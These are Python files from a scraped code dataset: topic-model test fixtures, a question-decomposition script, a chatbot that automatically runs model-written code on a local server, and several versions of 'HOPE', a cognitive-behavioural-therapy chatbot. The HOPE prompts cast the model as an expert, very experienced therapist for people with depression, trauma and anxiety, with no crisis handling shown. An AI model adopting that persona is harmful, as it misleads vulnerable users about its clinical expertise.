return [(k, v) for k, v in training_params if type(v) != list or len(v) == 1] + [('{}.{}'.format(k, param), value) for k, v in regularizers_specs for param, value in v if type(value) != list or len(value) == 1]
@pytest.fixture(scope='session')
def regularizers_specs():
return [
('label-regularization-phi-dom-cls', [('tau', 1e5)]),
('decorrelate-phi-dom-def', [('tau', 1e4)])
]
@pytest.fixture(scope='session')
def tuning_parameters():
return dict(prefix_label=TUNE_LABEL_PREFIX,
# append_explorables=True,
# append_static=True,
force_overwrite=True,
cache_theta=True, verbose=False, interactive=False,
labeling_params=['nb-topics', 'background-topics-pct', 'collection-passes', 'document-passes', 'ideology-class-weight'],
preserve_order=False,
# parameter_set='training|regularization'
)
@pytest.fixture(scope='session')
def model_names(tuning_parameters, training_params, expected_labeling_parameters):
"""alphabetically sorted expected model names to persist (phi and results)"""
def _mock_label(labeling, params_data):
inds = Counter()
params_data = OrderedDict(params_data)
for l in labeling:
if type(params_data[l]) != list or len(params_data[l]) == 1:
yield params_data[l]
else:
inds[l] += 1
yield params_data[l][inds[l] - 1]
nb_models = reduce(lambda k,l: k*l, [len(span) if type(span) == list else 1 for _, span in training_params])
prefix = ''
if tuning_parameters['prefix_label']:
prefix = tuning_parameters['prefix_label'] + '_'
return sorted([prefix + '_'.join(str(x) for x in _mock_label(expected_labeling_parameters, training_params)) for _ in range(nb_models)])
@pytest.fixture(scope='session')
def expected_labeling_parameters(tuning_parameters, training_params, expected_constant_params, expected_explorable_params):
static_flag = {True: [x[0] for x in expected_constant_params],
False: []}
explorable_flag = {True: [x[0] for x in expected_explorable_params],
False: []}
if tuning_parameters['labeling_params']:
labeling_params = tuning_parameters['labeling_params']
else:
labeling_params = static_flag[tuning_parameters['append_static']] + explorable_flag[tuning_parameters['append_explorables']]
if tuning_parameters['preserve_order']:
return [x for x in training_params if x in labeling_params]
return labeling_params
@pytest.fixture(scope='session')
def tuner_obj(collections_root_dir, test_dataset, training_params, regularizers_specs, tuning_parameters):
tuner = Tuner(os.path.join(collections_root_dir, test_dataset.name), {
'perplexity': 'per',
'sparsity-phi-@dc': 'sppd',
'sparsity-theta': 'spt',
'topic-kernel-0.60': 'tk60',
'topic-kernel-0.80': 'tk80',
'top-tokens-10': 'top10',
'top-tokens-100': 'top100',
'background-tokens-ratio-0.3': 'btr3',
'background-tokens-ratio-0.2': 'btr2'
})
tuner.training_parameters = training_params
tuner.regularization_specs = regularizers_specs
tuner.tune(**tuning_parameters)
return tuner
@pytest.fixture(scope='session')
def dataset_reporter(tuner_obj):
return DatasetReporter(os.path.dirname(tuner_obj.dataset))
@pytest.fixture(scope='session')
def graphs_parameters():
return {'selection': 3,
'metric': 'alphabetical',
'score_definitions': ['background-tokens-ratio-0.30', 'kernel-coherence-0.80', 'sparsity-theta', 'top-tokens-coherence-10'],
'tau_trajectories': '',
# 'tau_trajectories': 'all',
}
@pytest.fixture(scope='session')
def graphs(exp_res_obj1, trained_model_n_experiment, tuner_obj, graphs_parameters):
graph_maker = GraphMaker(os.path.dirname(tuner_obj.dataset))
sparser_regularizers_tau_coefficients_trajectories = False
selection = graphs_parameters.pop('selection')
graph_maker.build_graphs_from_collection(os.path.basename(tuner_obj.dataset), selection, # use a maximal number of 8 models to compare together
**dict({'save': True, 'nb_points': None, 'verbose': False}, **graphs_parameters))
graphs_parameters['selection'] = selection
return graph_maker.saved_figures
############################################
@pytest.fixture(scope='session')
def json_path(collections_root_dir, test_collection_name):
return os.path.join(collections_root_dir, test_collection_name, 'results', 'toy-exp-res.json')
@pytest.fixture(scope='session')
def kernel_data_0():
return [
[[1, 2], [3, 4], [5, 6], [120, 100]],
{'t01': {'coherence': [1, 2, 3],
'contrast': [6, 3],
'purity': [1, 8]},
't00': {'coherence': [10, 2, 3],
'contrast': [67, 36],
'purity': [12, 89]},
't02': {'coherence': [10, 11],
'contrast': [656, 32],
'purity': [17, 856]}}
]
@pytest.fixture(scope='session')
def kernel_data_1():
return [[[10,20], [30,40], [50,6], [80, 90]], {'t01': {'coherence': [3, 9],
'contrast': [96, 3],
'purity': [1, 98]},
't00': {'coherence': [19,2,93],
'contrast': [7, 3],
'purity': [2, 89]},
't02': {'coherence': [0,11],
'contrast': [66, 32],
'purity': [17, 85]}
}]
@pytest.fixture(scope='session')
def exp_res_obj1(kernel_data_0, kernel_data_1, json_path, test_collection_dir):
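    # Build an ExperimentalResults object from hard-coded 'scalars', 'tracked' and 'final' sections, save it as JSON and return it.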
exp = ExperimentalResults.from_dict({
'scalars': {
'dir': 'a-dataset-dir',
'label': 'toy-exp-res',
'dataset_iterations': 3, # LEGACY '_' (underscore) usage
'nb_topics': 5, # LEGACY '_' (underscore) usage
'document_passes': 2, # LEGACY '_' (underscore) usage
'background_topics': ['t0', 't1'], # LEGACY '_' (underscore) usage
'domain_topics': ['t2', 't3', 't4'], # LEGACY '_' (underscore) usage
'modalities': {'dcn': 1, 'icn': 5}
},
'tracked': {
'perplexity': [1, 2, 3],
'sparsity-phi-@dc': [-2, -4, -6],
'sparsity-phi-@ic': [-56, -12, -32],
'sparsity-theta': [2, 4, 6],
'background-tokens-ratio-0.3': [0.4, 0.3, 0.2],
'topic-kernel': {
'0.60': {
'avg_coh': kernel_data_0[0][0],
'avg_con': kernel_data_0[0][1],
'avg_pur': kernel_data_0[0][2],
'size': kernel_data_0[0][3],
'topics': kernel_data_0[1]
},
'0.80': {
'avg_coh': kernel_data_1[0][0],
'avg_con': kernel_data_1[0][1],
'avg_pur': kernel_data_1[0][2],
'size': kernel_data_1[0][3],
'topics': kernel_data_1[1]
}
},
'top-tokens': {
'10': {
'avg_coh': [5, 6, 7],
'topics': {'t01': [12, 22, 3], 't00': [10, 2, 3], 't02': [10, 11]}
},
'100': {
'avg_coh': [10, 20, 30],
'topics': {'t01': [5, 7, 9], 't00': [12, 32, 3], 't02': [11, 1]}
}
},
'tau-trajectories': {'phi': [1, 2, 3], 'theta': [5, 6, 7]},
'regularization-dynamic-parameters': {'type-a': {'tau': [1, 2, 3]},
'type-b': {'tau': [-1, -1, -2], 'alpha': [1, 1.2]}},
'collection-passes': [3]
},
'final': {
'topic-kernel': {
'0.60': {'t00': ['a', 'b', 'c'],
't01': ['d', 'e', 'f'],
't02': ['g', 'h', 'i']},
'0.80': {'t00': ['j', 'k', 'l'],
't01': ['m', 'n', 'o'],
't02': ['p', 'q', 'r']}
},
'top-tokens': {
'10': {
't00': ['s', 't', 'u'],
't01': ['v', 'x', 'y'],
't02': ['z', 'a1', 'b1']
},
'100': {
't00': ['c1', 'd1', 'e1'],
't01': ['f1', 'g1', 'h1'],
't02': ['i1', 'j1', 'k1']
}
},
'background-tokens': ['l1', 'm1', 'n1']
},
'regularizers': ['reg1_params_pformat', 'reg2_params_pformat'],
'reg_defs': {'type-a': 'reg1', 'type-b': 'reg2'},
'score_defs': {'perplexity': 'prl', 'top-tokens-10': 'top10'}
})
if not os.path.isdir(os.path.join(test_collection_dir, 'results')):
os.mkdir(os.path.join(test_collection_dir, 'results'))
exp.save_as_json(json_path)
return exp
| [] |
2024-01-10 | jayralencar/visconde | iirc_query_decomposition.py | import openai
import os
from transformers import GPT2Tokenizer
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
openai.api_key = os.getenv("OPENAI_API_KEY")
def generate(prompt,max_tokens=1000, temperature=0):
tokens = tokenizer.tokenize(prompt)
response = openai.Completion.create(
engine="text-davinci-002",
prompt=prompt,
temperature=temperature,
max_tokens=max_tokens,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
return response["choices"][0]['text']
def decompose(question):
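    # Few-shot prompt that asks the model to split a question into self-contained sub-questions, or to state that no decomposition is needed.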
prompt="Decompose a question in self-contained sub-questions. Use \"The question needs no decomposition\" when no decomposition is needed.\n\nExample 1:\n\nQuestion: Is Hamlet more common on IMDB than Comedy of Errors?\n\nDecompositions: \n1: How many listings of Hamlet are there on IMDB?\n2: How many listing of Comedy of Errors is there on IMDB?\n\nExample 2:\n\nQuestion: Are birds important to badminton?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 3:\n\nQuestion: Is it legal for a licensed child driving Mercedes-Benz to be employed in US?\n\nDecompositions:\n1: What is the minimum driving age in the US?\n2: What is the minimum age for someone to be employed in the US?\n\nExample 4:\n\nQuestion: Are all cucumbers the same texture?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 5:\n\nQuestion: Hydrogen's atomic number squared exceeds number of Spice Girls?\n\nDecompositions:\n1: What is the atomic number of hydrogen?\n2: How many Spice Girls are there?\n\nExample 6:\n\nQuestion: {0}\n\nDecompositions:"
res = generate(prompt.format(question), max_tokens=256)
# print(res)
if res.lower().strip() == "the question needs no decomposition.":
return [question]
try:
questions = [l for l in res.splitlines() if l != ""]
questions = [q.split(':')[1].strip() for q in questions]
return questions
except:
return [question]
| [
"Decompose a question in self-contained sub-questions. Use \"The question needs no decomposition\" when no decomposition is needed.\n\nExample 1:\n\nQuestion: Is Hamlet more common on IMDB than Comedy of Errors?\n\nDecompositions: \n1: How many listings of Hamlet are there on IMDB?\n2: How many listing of Comedy of Errors is there on IMDB?\n\nExample 2:\n\nQuestion: Are birds important to badminton?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 3:\n\nQuestion: Is it legal for a licensed child driving Mercedes-Benz to be employed in US?\n\nDecompositions:\n1: What is the minimum driving age in the US?\n2: What is the minimum age for someone to be employed in the US?\n\nExample 4:\n\nQuestion: Are all cucumbers the same texture?\n\nDecompositions:\nThe question needs no decomposition\n\nExample 5:\n\nQuestion: Hydrogen's atomic number squared exceeds number of Spice Girls?\n\nDecompositions:\n1: What is the atomic number of hydrogen?\n2: How many Spice Girls are there?\n\nExample 6:\n\nQuestion: {0}\n\nDecompositions:"
] |
2024-01-10 | ChrisDeadman/codebot | codebot~codebot.py | from collections import deque
import openai
import requests
from utils import num_tokens_from_messages
from utils.cyclic_buffer import CyclicBuffer
# define color codes
COLOR_GREEN = "\033[32m"
COLOR_ORANGE = "\033[33m"
COLOR_GRAY = "\033[90m"
COLOR_RESET = "\033[0m"
class Message:
def __init__(self, role, content):
self.role = role
self.content = content
def to_dict(self):
return {"role": self.role, "content": self.content}
class Codebot:
def __init__(
self,
initial_prompt: str,
api_key: str,
buffer_capacity=15,
max_tokens: int = 4000,
):
self.messages = CyclicBuffer[Message](buffer_capacity)
self.initial_prompt = Message("system", initial_prompt)
self.max_tokens = max_tokens
openai.api_key = api_key
def chat_with_gpt(self) -> str:
messages = deque([m.to_dict() for m in self.messages])
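        # Drop the oldest messages until the initial prompt plus history fits within the token budget.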
while True:
message_dicts = [self.initial_prompt.to_dict()] + list(messages)
num_tokens = num_tokens_from_messages(message_dicts)
if num_tokens < self.max_tokens:
break
if messages:
# remove oldest message and try again
messages.popleft()
else:
# no more messages
self.messages.pop()
return (
f"Too many tokens ({num_tokens}>{self.max_tokens}), "
f"please limit your message size!"
)
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo", messages=message_dicts
)
return response.choices[0].message.content
def parse_response(self, input_str: str):
result = []
in_code_block = False
ignore_code_block = False
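        # Toggle code-block state on fence lines; only Python-fenced blocks (or plain fences when no Python fence appears in the response) are treated as executable code.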
for line in input_str.split("\n"):
if line.startswith("```"):
in_code_block = not in_code_block
if in_code_block:
if line.replace(" ", "").startswith("```python") or (
line.strip() == "```"
and not ("```python" in input_str or "``` python" in input_str)
):
ignore_code_block = False
else:
ignore_code_block = True
if ignore_code_block:
result.append({"code": False, "content": line})
if not in_code_block:
ignore_code_block = False
else:
is_code = in_code_block and not ignore_code_block
result.append({"code": is_code, "content": line})
return result
def execute_code(self, code: str):
try:
response = requests.post(
"http://localhost:8080/execute", data=code.encode("utf-8")
)
result = response.content.decode("utf-8")
except Exception as e:
result = str(e)
return result
def run(self):
user_input = input("You: ")
user_cmd = user_input.strip().lower()
if user_cmd == "reset" or user_cmd == "clear":
self.messages.clear()
return True
elif user_cmd == "exit":
return False
if user_input.strip():
self.messages.push(Message("user", user_input))
gpt_response = self.chat_with_gpt()
if gpt_response.strip():
self.messages.push(Message("assistant", gpt_response))
gpt_response_parsed = self.parse_response(gpt_response)
gpt_code = "\n".join(
map(
lambda r: r["content"],
filter(lambda r: r["code"], gpt_response_parsed),
)
)
for r in gpt_response_parsed:
if r["code"]:
print(f"{COLOR_GREEN}{r['content']}{COLOR_RESET}")
else:
print(f"{COLOR_GRAY}{r['content']}{COLOR_RESET}")
if gpt_code.strip():
result = self.execute_code(gpt_code)
print(f"{COLOR_ORANGE}Output: {result}{COLOR_RESET}")
self.messages.push(Message("system", f"Output: {result}"))
return True
if __name__ == "__main__":
with open("data/initial_prompt.txt", "r") as f:
initial_prompt = f.read()
with open("data/openai_api_key.txt", "r") as f:
api_key = f.read()
codebot = Codebot(initial_prompt, api_key)
while codebot.run():
pass # Run until complete
| [
"[self.initial_prompt.to_dict()] + list(messages)",
"assistant",
"user",
"Output: PLACEHOLDER",
"system"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~reply.py | # take user input from text file, append it to session chat, put reply in output.txt
# import sys
# sys.stdin = open("file_rw\\input.txt","r")
# sys.stdout = open("file_rw\\input.txt","w")
import openai
import sys
inp = sys.argv[1:]
inp_str = ""
import os
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
for i in inp:
inp_str += i + " "
prompt = "#Client: " + inp_str + "\n#HOPE:"
print(prompt)
response = openai.Completion.create(
engine = "text-davinci-003",
max_tokens = 512,
prompt = prompt,
temperature = 0, # Risk taking ability - 0
    top_p = 1.0, # Influencing sampling - 1.0
frequency_penalty = 0.0, # Penalties for repeated tokens - 0.0
presence_penalty = 0.0, # Penalties for new words - 0.0
stop = ["#"] # when to stop generating
)
print(response.choices[0].text)
#stop at "#"
# append | [
"#Client: PLACEHOLDER\n#HOPE:"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~main_01.py | import streamlit as st
from langchain import PromptTemplate,LLMChain
from langchain.memory import ConversationBufferWindowMemory
#from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
st.set_page_config(page_title='HOPE', layout='wide')
st.title("HOPE")
import os
from dotenv import load_dotenv
load_dotenv()
OPENAI_API_KEY = os.getenv("OPENAI_API_KEY")
#MODEL = 'text-davinci-003' # options=['gpt-3.5-turbo','text-davinci-003','text-davinci-002'])
K = 5
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
def get_text():
input_text = st.text_input("You: ", st.session_state["input"], key="input",
placeholder="I am your HOPE! Ask me anything ...",
label_visibility='hidden')
return input_text
def new_chat():
"""
Clears session state and starts a new chat.
"""
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
st.session_state.entity_memory.store = {}
st.session_state.entity_memory.buffer.clear()
# st.write(st.session_state.entity_memory.store)
# st.write(st.session_state.entity_memory.buffer)
# Create a ConversationEntityMemory object if not already created
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationEntityMemory(llm=OpenAI(temperature=0), k=K )
# Create the ConversationChain object with the specified configuration
bot_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
st.sidebar.button("New Chat", on_click = new_chat, type='primary')
user_input = get_text()
if user_input:
output = bot_chain.predict(human_input = user_input)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
print(st.session_state["generated"])
# Display the conversation history using an expander, and allow the user to download it
with st.expander("Conversation", expanded=True):
for i in range(len(st.session_state['generated'])-1, -1, -1):
st.success("Hope: "+st.session_state["generated"][i]) # icon="🤖"
st.info("User: "+st.session_state["past"][i])
# Display stored conversation sessions in the sidebar
for i, sublist in enumerate(st.session_state.stored_session):
with st.sidebar.expander(label= f"Conversation-Session:{i}"):
st.write(sublist)
# Allow the user to clear all stored conversation sessions
if st.session_state.stored_session:
if st.sidebar.checkbox("Clear-all"):
del st.session_state.stored_session
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~memory_bot.py | from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
# Hope may also suggest breathing exercises for anxiety and other conventional methods or simple tasks that may help the user.
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K)
)
flag = 1
while(flag == 1):
inp = str(input("User:"))
if(inp == "exit"):
print("Bye :)")
flag = 0
continue
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~memory_bot_cli.py | from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import sys
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
inp = sys.argv[1:]
inp_str = ""
for i in inp:
inp_str += i + " "
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
flag = 1
change = 0
inp_prev = ""
inp = "hi"
while(flag == 1):
while(change == 0):
with open("file_rw\\input.txt", "r") as file:
inp = file.read().strip()
if(inp != ""):
if(inp.endswith("###")):
if(inp != inp_prev):
change = 1
inp_prev = inp
inp = inp.replace("###","")
if(inp == "exit"):
print("Bye :)")
flag = 0
continue
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
with open("file_rw\output.txt", 'w') as f:
f.write(output+"###")
change = 0
| [
"Hope is an expert in performing Cognitive Behavioural Therapy.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~hope_host.py | import streamlit as st
from streamlit_chat import message
from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
os.environ["OPENAI_API_KEY"] = st.secrets["OPENAI_API_KEY"]
template = st.secrets["template"]
MODEL = 'text-davinci-003'
K = 10
st.set_page_config(page_title='HOPE', layout='wide')
st.title("HOPE")
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
def get_text():
input_text = st.text_input("You: ", st.session_state["input"], key="input",
placeholder="I am your HOPE! Ask me anything ...",
label_visibility='hidden')
return input_text
def new_chat():
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
llm = OpenAI(temperature=0)
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationBufferWindowMemory(k=K)
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
bot_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=st.session_state.entity_memory
)
st.sidebar.button("New Chat", on_click = new_chat, type='primary')
user_input = get_text()
if user_input:
output = bot_chain.predict(human_input = user_input)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
with st.expander("Conversation", expanded=True):
for i in range(len(st.session_state['generated'])-1, -1, -1):
message(st.session_state["generated"][i], key=str(i))
message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')
for i, sublist in enumerate(st.session_state.stored_session):
with st.sidebar.expander(label= f"Conversation-Session:{i}"):
st.write(sublist)
if st.session_state.stored_session:
if st.sidebar.checkbox("Clear-all"):
del st.session_state.stored_session
| [
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~start_convo.py | # pass all details stored in the jason file in a structured prompt
import openai
import os
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
import json
prompt = "You are HOPE who is an expert in performing Cognitive Behavioural therapy.The major problems faced by your client are "
with open("file_rw\\userid.json","r") as jsonFile:
jsonObj = json.load(jsonFile)
jsonFile.close()
problems = jsonObj['problems']
summary = jsonObj['summary']
#print(problems,"\n",summary)
for i in range(len(problems)-1):
prompt = prompt + problems[i] + ","
prompt = prompt + problems[-1] + "."
#print(prompt)
prompt = prompt + "Following is the summary of what the client has conversed with you \n#Start of summary:\n" + summary + "\n#End of Summary\n"
prompt = prompt + "The following is a conversation between Client and HOPE:"
print(prompt)
response = openai.Completion.create(
engine = "text-davinci-003",
max_tokens = 512,
prompt = prompt,
temperature = 0.5, # Risk taking ability
    top_p = 1.0, # Influencing sampling
frequency_penalty = 0.0, # Penalties for repeated tokens
presence_penalty = 0.0, # Penalties for new words
stop = ["#"] # when to stop generating
)
#print(response.choices[0].text) | [
"You are HOPE who is an expert in performing Cognitive Behavioural therapy.The major problems faced by your client are ",
"PLACEHOLDERFollowing is the summary of what the client has conversed with you \n#Start of summary:\nPLACEHOLDER\n#End of Summary\n",
"PLACEHOLDERThe following is a conversation between Client and HOPE:",
"PLACEHOLDERPLACEHOLDER."
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | hope~application~models~memory_bot.py | #!/usr/local/bin/python3
import cgi,cgitb
print ("")
import sys
import os
from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
from langchain.memory import ConversationBufferWindowMemory
import os
from dotenv import load_dotenv
load_dotenv()
os.environ["OPENAI_API_KEY"] = os.getenv("OPENAI_API_KEY")
K = 10 # Number of previous convo
print('hello')
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{history}
User: {human_input}
Hope:"""
# Hope may also suggest breathing exercises for anxiety and other conventional methods or simple tasks that may help the user.
prompt = PromptTemplate(
input_variables=["history", "human_input"],
template=template
)
chatgpt_chain = LLMChain(
llm=OpenAI(temperature=0),
prompt=prompt,
verbose=True,
memory=ConversationBufferWindowMemory(k=K),
)
flag = 1
change = 0
inp_prev = ""
inp = "hi"
while(flag == 1):
while(change == 0):
with open("application/models/input.txt", "r") as file:
inp = file.read().strip()
if(inp != ""):
if(inp.endswith("###")):
if(inp != inp_prev):
change = 1
inp_prev = inp
inp = inp.replace("###","")
if(inp == "exit"):
print("Bye :)")
with open("application/models/output.txt", 'w') as f:
f.write("session ended###")
flag = 0
else:
output = chatgpt_chain.predict(human_input = inp)
print("Hope:",output)
with open("application/models/output.txt", 'w') as f:
f.write(output+"###")
change = 0
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{history}\nUser: {human_input}\nHope:",
"human_input"
] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~Testing~stateful_bot.py | import streamlit as st
from langchain.chains import ConversationChain
from langchain.chains.conversation.memory import ConversationEntityMemory
from langchain.chains.conversation.prompt import ENTITY_MEMORY_CONVERSATION_TEMPLATE
from langchain.llms import OpenAI
import openai
import os
from dotenv import load_dotenv
load_dotenv()
openai_api_key = os.getenv("OPENAI_API_KEY")
openai.api_key = os.getenv("OPENAI_API_KEY")
MODEL = "gpt-3.5-turbo"
K = 10
if "generated" not in st.session_state:
st.session_state["generated"] = []
if "past" not in st.session_state:
st.session_state["past"] = []
if "input" not in st.session_state:
st.session_state["input"] = ""
if "stored_session" not in st.session_state:
st.session_state["stored_session"] = []
user_input = str(input("User:"))
# Create an OpenAI instance
llm = OpenAI(temperature=0,
openai_api_key = openai_api_key,
model_name=MODEL,
verbose=False)
# Create a ConversationEntityMemory object if not already created
if 'entity_memory' not in st.session_state:
st.session_state.entity_memory = ConversationEntityMemory(llm=llm, k=K ) # K is number of outputs to consider
# Create the ConversationChain object with the specified configuration
Conversation = ConversationChain(
llm=llm,
prompt=ENTITY_MEMORY_CONVERSATION_TEMPLATE,
memory=st.session_state.entity_memory
)
output = Conversation.run(input=user_input)
print(output)
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
def new_chat(): # Clears session state and starts a new chat.
save = []
for i in range(len(st.session_state['generated'])-1, -1, -1):
save.append("User:" + st.session_state["past"][i])
save.append("Bot:" + st.session_state["generated"][i])
st.session_state["stored_session"].append(save)
st.session_state["generated"] = []
st.session_state["past"] = []
st.session_state["input"] = ""
st.session_state.entity_memory.store = {}
st.session_state.entity_memory.buffer.clear()
| [] |
2024-01-10 | vansh18/Google-Solution-Challenge-2023 | file_rw~main_02.py | import openai
# from langchain import OpenAI, ConversationChain, LLMChain, PromptTemplate
# from langchain.memory import ConversationBufferWindowMemory
import streamlit as st
from streamlit_chat import message
import os
from dotenv import load_dotenv
load_dotenv()
OPENAI_API_KEY = os.getenv("OPENAI_API_KEY")
openai.api_key = OPENAI_API_KEY
K = 10 # Number of previous convo
template = """Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.
Hope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.
User will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.
Hope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.
Hope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.
{chat_history}
User: {human_input}
Hope:"""
def generate_response(inp,temp):
# prompt = PromptTemplate(
# input_variables=["history", "human_input"],
